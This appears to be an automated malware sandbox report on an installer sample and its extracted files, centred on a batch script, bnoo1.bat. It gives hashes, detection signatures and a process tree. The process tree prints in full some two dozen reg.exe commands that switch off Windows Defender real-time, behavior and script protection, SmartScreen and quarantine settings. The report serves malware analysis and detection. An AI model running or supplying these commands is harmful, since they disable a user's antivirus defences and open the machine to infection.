Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 14:00
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20241010-en
windows7-x64
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20241023-en
windows7-x64
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20241023-en
windows7-x64
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240708-en
windows7-x64
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
General
-
Target
$_63_/bnoo1.bat
-
Size
2KB
-
MD5
1f89930c9e4fd56765ca2ac17e06817d
-
SHA1
cecb1c4a81dc27a6f4379ead464f418a1bf10ce9
-
SHA256
2de693852c2127d52fe758bde2fa606d3adf5f4eb790f186797abc48e3e892e7
-
SHA512
488f77ba07c40a27c3f76636fba2479146ce6aa0b6a4948677e4cc5a2937eae42f2b15c2bbf13ebb95cf3e2bd0ace5fa525072cb2bcd368571f8fe79eb6fcd1c
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2248 wrote to memory of 1944 2248 cmd.exe 31 PID 2248 wrote to memory of 1944 2248 cmd.exe 31 PID 2248 wrote to memory of 1944 2248 cmd.exe 31 PID 2248 wrote to memory of 2072 2248 cmd.exe 32 PID 2248 wrote to memory of 2072 2248 cmd.exe 32 PID 2248 wrote to memory of 2072 2248 cmd.exe 32 PID 2248 wrote to memory of 2460 2248 cmd.exe 33 PID 2248 wrote to memory of 2460 2248 cmd.exe 33 PID 2248 wrote to memory of 2460 2248 cmd.exe 33 PID 2248 wrote to memory of 2204 2248 cmd.exe 34 PID 2248 wrote to memory of 2204 2248 cmd.exe 34 PID 2248 wrote to memory of 2204 2248 cmd.exe 34 PID 2248 wrote to memory of 1892 2248 cmd.exe 35 PID 2248 wrote to memory of 1892 2248 cmd.exe 35 PID 2248 wrote to memory of 1892 2248 cmd.exe 35 PID 2248 wrote to memory of 2512 2248 cmd.exe 36 PID 2248 wrote to memory of 2512 2248 cmd.exe 36 PID 2248 wrote to memory of 2512 2248 cmd.exe 36 PID 2248 wrote to memory of 2500 2248 cmd.exe 37 PID 2248 wrote to memory of 2500 2248 cmd.exe 37 PID 2248 wrote to memory of 2500 2248 cmd.exe 37 PID 2248 wrote to memory of 480 2248 cmd.exe 38 PID 2248 wrote to memory of 480 2248 cmd.exe 38 PID 2248 wrote to memory of 480 2248 cmd.exe 38 PID 2248 wrote to memory of 2860 2248 cmd.exe 39 PID 2248 wrote to memory of 2860 2248 cmd.exe 39 PID 2248 wrote to memory of 2860 2248 cmd.exe 39 PID 2248 wrote to memory of 1912 2248 cmd.exe 40 PID 2248 wrote to memory of 1912 2248 cmd.exe 40 PID 2248 wrote to memory of 1912 2248 cmd.exe 40 PID 2248 wrote to memory of 2120 2248 cmd.exe 41 PID 2248 wrote to memory of 2120 2248 cmd.exe 41 PID 2248 wrote to memory of 2120 2248 cmd.exe 41 PID 2248 wrote to memory of 2064 2248 cmd.exe 42 PID 2248 wrote to memory of 2064 2248 cmd.exe 42 PID 2248 wrote to memory of 2064 2248 cmd.exe 42 PID 2248 wrote to memory of 2288 2248 cmd.exe 43 PID 2248 wrote to memory of 2288 2248 cmd.exe 43 PID 2248 wrote to memory of 2288 2248 cmd.exe 43 PID 2248 wrote to memory of 2080 2248 cmd.exe 44 PID 2248 wrote to memory of 2080 2248 cmd.exe 44 PID 2248 wrote to memory of 2080 2248 cmd.exe 44 PID 2248 wrote to memory of 2084 2248 cmd.exe 45 PID 2248 wrote to memory of 2084 2248 cmd.exe 45 PID 2248 wrote to memory of 2084 2248 cmd.exe 45 PID 2248 wrote to memory of 2312 2248 cmd.exe 46 PID 2248 wrote to memory of 2312 2248 cmd.exe 46 PID 2248 wrote to memory of 2312 2248 cmd.exe 46 PID 2248 wrote to memory of 1592 2248 cmd.exe 47 PID 2248 wrote to memory of 1592 2248 cmd.exe 47 PID 2248 wrote to memory of 1592 2248 cmd.exe 47 PID 2248 wrote to memory of 2108 2248 cmd.exe 48 PID 2248 wrote to memory of 2108 2248 cmd.exe 48 PID 2248 wrote to memory of 2108 2248 cmd.exe 48 PID 2248 wrote to memory of 2308 2248 cmd.exe 49 PID 2248 wrote to memory of 2308 2248 cmd.exe 49 PID 2248 wrote to memory of 2308 2248 cmd.exe 49 PID 2248 wrote to memory of 2020 2248 cmd.exe 50 PID 2248 wrote to memory of 2020 2248 cmd.exe 50 PID 2248 wrote to memory of 2020 2248 cmd.exe 50 PID 2248 wrote to memory of 2492 2248 cmd.exe 51 PID 2248 wrote to memory of 2492 2248 cmd.exe 51 PID 2248 wrote to memory of 2492 2248 cmd.exe 51 PID 2248 wrote to memory of 2344 2248 cmd.exe 52
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnoo1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f2⤵PID:2072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:2460
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f2⤵PID:2204
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f2⤵PID:1892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f2⤵PID:2512
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f2⤵PID:2500
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f2⤵PID:480
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f2⤵PID:2860
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f2⤵PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f2⤵PID:2120
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2064
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2288
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2080
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2084
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2312
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1592
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2108
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2308
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2020
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f2⤵PID:2492
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f2⤵PID:2344
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f2⤵PID:2484
-